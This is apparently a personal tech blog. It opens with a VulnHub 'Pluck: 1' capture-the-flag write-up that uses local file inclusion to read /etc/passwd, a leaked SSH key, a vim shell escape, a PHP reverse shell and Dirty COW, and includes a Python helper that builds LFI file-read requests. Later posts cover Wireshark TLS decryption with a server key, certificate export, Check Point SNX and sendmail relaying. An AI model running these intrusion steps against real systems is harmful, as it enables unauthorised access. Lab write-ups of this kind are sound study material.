
pluck: 1 – Writeup

Getting ready for NetWars later this month, it was time to sharpen my game. Let's pick the first good VulnHub VM and have a go. Pluck: 1 looked like a good start; no info whatsoever, let's see how it goes.

First, let's run an nmap scan and discover what services we have to deal with.

Okay, we've got a web server, and MySQL? Let's look at what web page we have.

Looks like a Bootstrap theme, and by clicking around I can see it's using ?page=filename.php
This smells like LFI; quickly grab /etc/passwd to verify.

Look at the last line, that looks interesting...
backup-user:x:1003:1003:Just to make backups easier,,,:/backup:/usr/local/scripts/backup.sh
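Pulling /etc/passwd through the include is the easy part; the useful part is spotting the one line that is not boilerplate. The following is an added example, not code from the original writeup: it builds the ?page= request for an absolute path, parses whatever passwd-format lines come back (the include is usually wrapped in the page's HTML), and flags accounts whose shell or home directory is non-standard, which is exactly how the backup-user line stands out. The target URL, the UIDs for bob and paul and the surrounding HTML are constructed for offline use; only the backup-user line is taken from the page.

```python
"""Added example (not from the original writeup): fetch /etc/passwd via the
?page= LFI and flag accounts worth a second look.

Assumptions (not from the page): the vulnerable parameter is ?page= on the
web root and the response body contains the raw file inside the page HTML.
The base URL and the sample response below are constructed for offline use.
"""
import urllib.request
from urllib.parse import urlencode

# Shells that normally mean "ordinary interactive login". Anything else that
# is not a nologin shell (a menu binary, a custom script) is what we want.
STANDARD_SHELLS = {"/bin/bash", "/bin/sh", "/bin/dash", "/bin/zsh", "/usr/bin/zsh"}
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def lfi_url(base, path, param="page"):
    """Build the include URL for an absolute path on the target (hypothetical)."""
    return f"{base.rstrip('/')}/?{urlencode({param: path})}"


def fetch_lfi(base, path, timeout=10):
    """Request the file through the LFI and return the response body as text."""
    with urllib.request.urlopen(lfi_url(base, path), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def parse_passwd(text):
    """Parse passwd-format lines into dicts, skipping the HTML around the include."""
    users = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7 or not parts[2].isdigit() or not parts[3].isdigit():
            continue
        users.append({"name": parts[0], "uid": int(parts[2]), "gid": int(parts[3]),
                      "gecos": parts[4], "home": parts[5], "shell": parts[6]})
    return users


def interesting_accounts(users):
    """Return (username, reason) pairs for accounts that deserve a closer look."""
    hits = []
    for u in users:
        if u["shell"] in NOLOGIN_SHELLS:
            continue                      # service account, nothing to log in as
        if u["shell"] not in STANDARD_SHELLS:
            hits.append((u["name"], f"non-standard shell {u['shell']}"))
        elif u["uid"] >= 1000 and not u["home"].startswith("/home/"):
            hits.append((u["name"], f"home outside /home: {u['home']}"))
        elif u["uid"] >= 1000:
            hits.append((u["name"], "interactive user; try SSH with any recovered keys"))
    return hits


# Constructed stand-in for the LFI response: page HTML around the included
# file. Only the backup-user line is from the real box; the rest is made up.
SAMPLE_RESPONSE = """<html><body><nav class="navbar">Pluck</nav>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:110:115:MySQL Server,,,:/nonexistent:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backup:/usr/local/scripts/backup.sh
</body></html>"""


if __name__ == "__main__":
    print(lfi_url("http://10.0.0.5", "/etc/passwd"))
    for name, reason in interesting_accounts(parse_passwd(SAMPLE_RESPONSE)):
        print(f"{name:12s} {reason}")
```

The shell field is the signal here: a login shell that is really a script (backup.sh) tells you where to look next, and a menu binary (pdmenu) tells you what you will be fighting after you get the SSH key to work.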

Could there be a TFTP server here as well? I know the filename I'm looking for, so this should be a quick win.

By extracting the backup.tar file I've got a backup of the /home/ directory and /var/www/html.

Quick side note: they are trolling the SQLi guys. Whenever you input the escape character in admin.php you get something that looks like a SQL error message.

Back on track, let's see what we have in the home directory. Paul is a user with a lot of keys. Check them all, and maybe we get lucky once more.

By using id_key4 I could log in as user paul without a password. I tested all other combinations for the known users (source: /etc/passwd), but with no luck. The paul user was limited to pdmenu.

Here I got a little bit stuck. It looks like it was possible to do some escaping from the "Edit file" menu, or even from the "www" (lynx) entry, but no luck. There must be some basic protection within pdmenu that prevents the normal escape routines from working. Using the directory listing and change directory options I could move around and look at the file system, but it was way too slow, and you had to type/remember your path and files. After trying it out a bit, it was time to move on; let's get a shell. I could use the edit file option and the Local File Inclusion to get me a www-data shell.

## Update ##
While playing with another shell escape: my normal escape with :!/bin/bash would not work as an escape from the Edit file menu.
But by setting the shell option with :set shell=/bin/bash and invoking it with :shell I could have skipped the PHP shell LFI workaround...


Dumped the pentestmonkey PHP reverse shell to /tmp and used the LFI to get a shell.

After running the most basic privilege escalation checks, and going back to the backup folder (it looks like the user bob had some sudo rights), I started looking for kernel exploits. Dirty COW should work on this version, and they did have gcc on it, but it was missing some libs, and I did not have a proper shell. So I booted up an Ubuntu 16.10 64-bit Server VM and built/tested it there. And I'm glad I did, because Dirty COW is unstable, and you have to be fast to input the magic line "echo 0 > /proc/sys/vm/dirty_writeback_centisecs", otherwise the system will crash and a reboot is necessary. Build/test and upload to target.

And that's it. I've got ROOT, and it's time to claim my flag.

This was a fun little evening session, but I do think there are other ways of getting in and around the system. I'll leave that for the next victim of pluck:1.


Wireshark – Passive SSL Decrypt

There are two ways of doing SSL decryption. In the first you are in control of the end client and can get the session keys out of it (for example a pre-master secret log written by the browser); this is the only way to decrypt cipher suites with DH or ECDH in the name, because with those the server's private key is only used for signing and never protects the session secret. The other is the passive way: you have a pcap of the traffic and the server's private key, and the cipher suite uses RSA key exchange, so the private key recovers the pre-master secret. Note that TLS 1.3 removed RSA key exchange entirely, so the passive method only works for TLS 1.2 and earlier.

This is a quick tutorial on passive decryption with the private key.

If you want to try it yourself, you can start with the LAMP stack VM provided by Turnkey.
Lampstack @ turnkeylinux.com

You only need to change one part: disable the ciphers and pick one you know you can do passive decryption on. If you have a working web server with SSL, disabling the cipher suites with DHE or ECDHE in the name should be enough.

File: /etc/apache2/mods-enabled/ssl.conf

## Disable all CipherSuites except the one we want.
-SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA:ECDHE-ECDSA-AES128-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA256
+SSLcipherSuite AES128-SHA

Remove the line marked with "-" (red), add the line marked with "+" (green), and restart Apache.
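Whether a pcap can be decrypted with just the server key comes down to the key exchange part of each suite name, so it helps to check the SSLCipherSuite value before recapturing. The following is an added example, not code from the original post: it splits an Apache SSLCipherSuite value (dropping OpenSSL keywords and modifiers such as HIGH or !aNULL), classifies each concrete suite by its key exchange, and returns the ones a private-key-only decrypt can handle. The two lists it is run against are the ones shown in the post above; the classification rules are based on OpenSSL's suite naming, where a missing prefix means RSA key exchange.

```python
"""Added example (not part of the original post): decide which suites in an
Apache SSLCipherSuite value can be decrypted passively with only the server's
RSA private key.

Passive decryption requires RSA key exchange: the client encrypts the
pre-master secret to the server's public key, so the private key recovers it.
(EC)DHE suites derive the secret per session and the private key only signs,
so the pcap alone cannot be decrypted. TLS 1.3 (TLS_* names) has no RSA key
exchange at all.
"""
import re

# OpenSSL-style suite names. Forward-secrecy and anonymous suites carry an
# explicit prefix; the plain "AES128-SHA" form is RSA key exchange.
_KX_PREFIXES = ("ECDHE-", "DHE-", "ECDH-", "DH-", "AECDH-", "ADH-")


def key_exchange(suite):
    """Return the key exchange family of one OpenSSL cipher suite name."""
    s = suite.upper()
    if s.startswith("TLS_"):            # TLS 1.3 names, e.g. TLS_AES_128_GCM_SHA256
        return "TLS1.3"
    for prefix in _KX_PREFIXES:
        if s.startswith(prefix):
            return prefix.rstrip("-")
    if s.startswith(("PSK-", "SRP-")) or "-PSK-" in s:
        return "PSK/SRP"
    return "RSA"


def passively_decryptable(suite):
    """True only for RSA key exchange (TLS 1.2 and earlier)."""
    return key_exchange(suite) == "RSA"


def split_cipher_list(value):
    """Split an SSLCipherSuite value into concrete suite names, dropping
    OpenSSL keywords (HIGH, ALL), modifiers (!aNULL, +RC4, -MD5) and sort
    directives (@STRENGTH)."""
    suites = []
    for item in re.split(r"[:,\s]+", value.strip()):
        if not item or item[0] in "!-+@":
            continue
        if "-" not in item and not item.startswith("TLS_"):
            continue                    # keyword such as HIGH or aRSA, not a suite
        suites.append(item)
    return suites


def decryptable_suites(value):
    """Suites from the directive value that a private-key-only decrypt handles."""
    return [s for s in split_cipher_list(value) if passively_decryptable(s)]


# The two values from the post: the list that was removed and its replacement.
ORIGINAL = ("ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:"
            "ECDHE-ECDSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA:ECDHE-ECDSA-AES128-SHA256:"
            "ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES128-GCM-SHA256:"
            "ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA:"
            "ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA384:DHE-RSA-AES128-GCM-SHA256:"
            "DHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:"
            "DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA256")
REPLACEMENT = "AES128-SHA"

if __name__ == "__main__":
    for name, value in (("original", ORIGINAL), ("replacement", REPLACEMENT)):
        print(name, "->", decryptable_suites(value) or "nothing decryptable passively")
```

Running it shows that the original list contains nothing a private key alone can decrypt (every suite is ECDHE or DHE), while the replacement AES128-SHA is RSA key exchange and works. The same check explains the failure mode of a real capture: if the negotiated suite in the Server Hello carries an ECDHE or DHE prefix, no amount of fiddling with the RSA keys list will help.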

Now you need the private key used by the server. This has to be added to Wireshark:
Edit -> Preferences
Under Protocols, select SSL (called TLS in newer Wireshark versions).

A debug file is smart to add; this way you can go through it and find out what is happening if decryption doesn't succeed. Just create an empty file and put its path in the "SSL debug file" field. Do not confuse it with the "(Pre)-Master-Secret log filename" field, which is for a key log captured from the client and is not needed for the private-key method.

The private key needs to have a .pem extension and needs to look something like this. On the LAMP stack it can be extracted from /etc/ssl/private/cert.pem

-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDgGR9EXjHqFjkq
....
3Na3f/8fjxGq+A7axImJVyk=
-----END PRIVATE KEY-----

Then you can add it to the RSA keys list. The IP address can be "any", or the IP of the server you're trying to decrypt traffic from. The port in this scenario should be 443 (https) and the protocol is http.

When you close all the windows, Wireshark will try to decrypt the traffic.
Follow TCP Stream is not useful here (it only shows the encrypted records), but Follow HTTP Stream works really well.

Here you can clearly see we have the HTTP request/response in clear text.

One quick note if you have problems: after the keys have been added to Wireshark, try reopening the pcap, or go back to the SSL preferences page and just press OK; this should trigger the decryption process. I've seen a couple of times where Wireshark is having problems and everything just fails even if you've done everything correctly.

Wireshark – export cert

Recently I've been working a lot with Wireshark, and in one scenario I had to verify which certificate was used. Exporting the public certificate from a Wireshark capture is pretty easy if you know what to do.

First you need to capture the handshake. If you see the Client/Server Hello messages but no Certificate message, you are probably looking at a resumed SSL session; you need to get the initial, full handshake. This also only works for TLS 1.2 and earlier: in TLS 1.3 the Certificate message is sent encrypted, so it is not visible in a plain capture.

If you do get the Certificate message, you can expand the Secure Sockets Layer tree to reach the cert.

The full certificate chain will be displayed, but you are probably interested in the first one (the server's own certificate). Right-click on that certificate line and choose "Export Packet Bytes...".

Save the file as "cert.der". The data will be saved in binary (DER) format.

Using the openssl suite you can now convert it into a more human-readable format.

openssl x509 -inform der -in cert.der -out cert.pem
openssl x509 -in cert.pem -text -noout

The first command converts the DER file to PEM; the second prints a text dump of the certificate.
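A frequent way this goes wrong is selecting the wrong tree node before "Export Packet Bytes...", which gives openssl a file that is a few bytes too long or too short and produces an unhelpful ASN.1 error. The following is an added example, not code from the original post: it checks that the exported blob is exactly one DER SEQUENCE (as every X.509 certificate is), converts it to PEM with the standard library, and computes the SHA-256 fingerprint you would compare against the server's expected certificate. The DER sample in the block is a constructed minimal SEQUENCE, not a real certificate; the functions work unchanged on a real cert.der.

```python
"""Added example (not from the original post): sanity-check a blob exported
with "Export Packet Bytes...", convert it to PEM, and fingerprint it.

An X.509 certificate is a single DER SEQUENCE (tag 0x30) whose length header
must account for exactly the bytes in the file. A truncated or over-long
export (wrong node selected in Wireshark) is caught here before openssl
complains about it less clearly.
"""
import hashlib
import ssl


def der_tlv_length(blob):
    """Total encoded length (header + content) of the outermost DER TLV.
    Raises ValueError if it is not a SEQUENCE or the length is malformed."""
    if len(blob) < 2 or blob[0] != 0x30:
        raise ValueError("not a DER SEQUENCE (certificates start with 0x30)")
    first = blob[1]
    if first < 0x80:                    # short form: one length byte
        return 2 + first
    n = first & 0x7F                    # long form: n following length bytes
    if n == 0 or n > 4 or len(blob) < 2 + n:
        raise ValueError("malformed DER length field")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def check_exported_der(blob):
    """Return True if blob is exactly one DER SEQUENCE; otherwise raise
    ValueError describing whether the export is truncated or has extra bytes."""
    total = der_tlv_length(blob)
    if total > len(blob):
        raise ValueError(f"truncated: header says {total} bytes, file has {len(blob)}")
    if total < len(blob):
        raise ValueError(f"{len(blob) - total} trailing byte(s) after the certificate")
    return True


def der_to_pem(blob):
    """PEM text equivalent to 'openssl x509 -inform der -in cert.der'."""
    check_exported_der(blob)
    return ssl.DER_cert_to_PEM_cert(blob)


def fingerprint_sha256(blob):
    """Colon-separated fingerprint, same form as 'openssl x509 -fingerprint -sha256'."""
    return ":".join(f"{b:02X}" for b in hashlib.sha256(blob).digest())


# Constructed stand-in: SEQUENCE { SEQUENCE { INTEGER 2 } }. Not a real
# certificate; a real cert.der from Wireshark goes through the same path.
SAMPLE_DER = bytes.fromhex("30053003020102")

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DER
    check_exported_der(data)
    print(der_to_pem(data))
    print("SHA256 Fingerprint=" + fingerprint_sha256(data))
```

Run it with the exported file as the first argument; the fingerprint line matches what "openssl x509 -in cert.pem -noout -fingerprint -sha256" prints, which is the quickest way to confirm that the certificate on the wire is the one you expected the server to present.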

Source Capture Cert: https://www.wireshark.org/lists/wireshark-users/201003/msg00080.html
Source Convert Cert: https://www.sslshopper.com/article-most-common-openssl-commands.html


Checkpoint SNX Office mode – MBA – Linux – JAVA FREE!

I've been doing this PoC for a customer, and it's been such a long case that I just need to share the essentials. It looks like a lot of people are getting their help from http://kenfallon.com/checkpont-snx-on-ubuntu-14-04-lts-trusty-tahr/

This works fine if you use the IPSec VPN blade, but NOT if you're using the Mobile Access Blade.
And I see a lot of questions about the SNX CLI build 800007075; you can get this from sk90240.

Well, if you are ever going to try getting the SNX CLI up and running with the Mobile Access Blade, here is a quick walkthrough.

  • Add a user
  • Add a user group and add the newly created user to it
  • Activate the Mobile Access Blade (wizard style)
    • Activate (see picture below)
      • WEB (SSL VPN Portal)
      • Mobile Devices -> Capsule VPN / Connect (this fixes the auth problems)
      • Desktop / Laptops -> Check Point Mobile for Windows (this fixes the office mode issues)
    • Change your portal to your public IP or DNS name
    • Keep the world clock demo app
    • Skip the Active Directory setup
    • Add the user group you created earlier
  • Create a rule in the normal firewall policy with source "CP_default_Office_Mode_Addresses_pool"
  • Save and push

Get your SNX client from sk90240.
chmod it and install.


Time to connect! 🙂

If you get something like this:

Check Point’s Linux SNX
build 800007075
Please enter your password:
error ‘expected open paren’ in state 1 depth 0

This means you have not activated the correct checkbox on the Mobile Access Blade.

If you're getting "Failed to decrypt password":

You are probably using another client than build 800007075; get the correct one from sk90240.

Quick and dirty post, just to get the essentials down for future reference.

And happy dance, since we now have a Linux VPN client for Check Point without Java! 😀

FreeBSD – Sendmail – Static relay

This is something I'm going to forget, and as I use this blog as my personal notebook, I need to document it.

I've had strange issues not being able to send mail from my web server to a specific domain. I've been troubleshooting with the hosting company, and they have tried to whitelist me, but without any luck. They do however have another SMTP server which does not include the same spam filter. But how can I redirect traffic there without changing public DNS?

Force sendmail to use a static relay host for a specific domain by adding an entry to the mailertable.


root@xxx:/etc/mail # cat mailertable
# $FreeBSD: releng/10.1/etc/mail/mailertable.sample 58193 2000-03-18 06:38:23Z rwatson $
#
# List of domains (possibly wildcarded) and destination mailers
#
static-domain.com smtp:smtp.somemailserver.com

After modifying the file, run "make" within the /etc/mail directory to rebuild the mailertable.db hash map.


root@xxx:/etc/mail # make
...
/usr/sbin/makemap hash mailertable.db < mailertable
chmod 0640 mailertable.db

Perfect. Looking at /var/log/maillog I can now see that the email is forwarded directly to my static relay server.